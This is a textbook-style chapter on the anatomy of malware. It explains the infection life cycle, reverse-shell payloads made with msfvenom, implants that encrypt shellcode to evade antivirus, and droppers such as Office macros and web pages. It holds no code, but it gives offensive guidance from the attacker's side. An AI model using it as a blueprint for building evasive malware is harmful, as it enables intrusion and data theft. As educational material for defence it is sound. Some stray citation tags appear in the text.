Chapter 2: Anatomy of a malware

This chapter details and describes the fundamental components of a malware and their functions.

2.1 The malware life cycle

Although each type of viral code uses different tools, technologies, and tactics, they all possess a single structural model based on the four phases that the viral code goes through (Figure 2.1). These phases are:

• Infection. The malware introduces itself into the system, overcoming any security barriers, and installs itself. Subsequently, it modifies the system settings, adapting them to its own needs, primarily that of not being detected.
• Quiescence. The viral code remains resident in memory waiting for a certain condition to be met, after which it activates and performs what it was programmed for (malicious actions and replication). This phase can be repeated multiple times until the malware deactivates or is detected by the antivirus.
• Replication and propagation (only for viruses and worms). Upon the occurrence of certain events or conditions, the malware replicates and selects the targets to propagate to, infecting other systems.
• Malicious actions. Upon the occurrence of certain events or conditions, the viral code performs its malicious tasks, such as, for example, the destruction or theft of system data. If the latter is not definitively compromised, the software returns to the quiescence phase awaiting another event or reactivation by the attacker.

Figure 2.1. The malware life cycle.

2.2 The physical components of malware

Malware are complex programs composed of an arbitrary number of parts. Some of these components have no utility but are mere “red herrings” and serve exclusively to divert the observer, the reverse engineer, from the true function of the software being analyzed; other components, instead, are fundamental and present in all types of malicious programs. The components in question can be implemented with different technologies, but their function always remains the same. The fundamental components are described in detail below.

2.2.1 The “active ingredient”

It all begins with the creation of a software that implements the basic functionalities of the malware; these, generally, allow the execution of arbitrary commands on the infected machine (malicious actions). This role is usually filled by the famous reverse shells¹. These are programs capable of opening a communication channel between the attacked machine and the attacker, allowing the latter to send commands to the infected system and receive their output. These softwares, although very simple, are among the most used because they are very versatile and able to bypass IDS/IPS systems and firewalls due to the fact that it is the victim themself who contacts the hacker (hence “reverse”) and not vice versa. There are hundreds of variants of reverse shells or, more generally, of payloads²; they are distinguished by the language they are written in, the connection mode (reverse and bind), and the communication protocol used (TCP, UDP, HTTP, etc.)[cite: 835, 836]. Various reverse shells can be found online both on dedicated sites, like exploit-db³ (Figure 2.2), and on more well-known and generic sites, like GitHub. However, the fastest and most precise way to obtain the payload we need is to use the msfvenom tool from the Metasploit framework. This is a software capable of dynamically generating a shellcode based on the options entered by the user; it is also capable of using encoding methods to disguise the final result (AV techniques) (Figure 2.3)[cite: 839, 840].

¹ https://www.acunetix.com/blog/web-security-zone/what-is-reverse-shell/

² https://www.offensive-security.com/metasploit-unleashed/payloads/

³ https://www.exploit-db.com

Figure 2.2. Non-exhaustive list of shellcodes available on exploit-db.

Figure 2.3. Creation of a shellcode using msfvenom.

2.2.2 The implant

The payload chosen for the attack is not always a full-fledged executable file. In fact, in the case of shellcodes, i.e., pure assembly code, the created code does not have an entry point and it is not possible to execute it like any other application. In these cases, an implant is used, which is a piece of code capable of properly launching the shellcode so that it can perform what it was generated for. The implant, therefore, must be a well-formed executable code that will call the shellcode using appropriate techniques (Figure 2.4).

Figure 2.4. The matryoshka doll structure of a malware.

In some cases (ours, for example), the implant is not limited to providing a framework for the shellcode, but also handles the decidedly more complex operations of shellcode obfuscation and trace cleanup[cite: 848, 849]. One of the biggest problems when building malware, in fact, is precisely that of making it invisible to antivirus (AV) software. In many cases, payloads generated automatically, with msfvenom, or downloaded from the web, do not satisfy this requirement because they are already present in the databases of AV vendors. To overcome this drawback, therefore, special encryption (or encoding) functions are used, inserted directly within the implant, to “hide” the shellcode and ensure that it can be executed without problems on the attacked system.

2.2.3 The vector (dropper)

The malware must, first of all, introduce itself into the target system and, if necessary, induce the victim to execute it. To do this, another software, distinct from the implant, is very often used, whose sole function is to transport the malicious executable “safe and sound” into the system. This program (in some cases it is simply a file) does not in itself have malicious or dangerous functionalities, but is limited to agnostically downloading the implant onto the target machine; having done this, through various steps, it ensures that it is executed by the user (Figure 2.4)[cite: 855, 856]. This software, precisely because of its function, in analogy with the world of biology, is called a vector or, using a more technical term, a dropper (from the English to drop, to download). The main technologies used for the construction of droppers are the following:

• Macros of the Office suite; the programs of the Office suite (Excel, Word, Powerpoint, etc.) have an interpreter that allows extending the already numerous functionalities by coding new ones[cite: 858, 859]. This feature can be exploited to our liking by creating code capable of downloading, via a web connection, a malicious file and executing it on the target. In this way, the Office file would be completely legitimate because, in fact, it does not perform any malicious action on the system; however, unbeknownst to it, it is the perpetrator of the infection[cite: 861, 862].
• Program containing bugs; another type of dropper consists of legitimate software but containing bugs. These can be tampered with so that they incorporate our implant into their code and, under particular conditions, exploiting precisely the relative bugs, they will call it, thus activating the payload.
• Web pages and emails; even the pages of a website or the emails themselves can be attack vectors. The former, consisting of a plethora of different technologies, can hide within them a fragment of code that downloads, unbeknownst to the user, a malicious file onto the victim’s personal computer. The same thing happens for emails. In recent years, much has been done in this regard, and now this type of threat is much less frequent.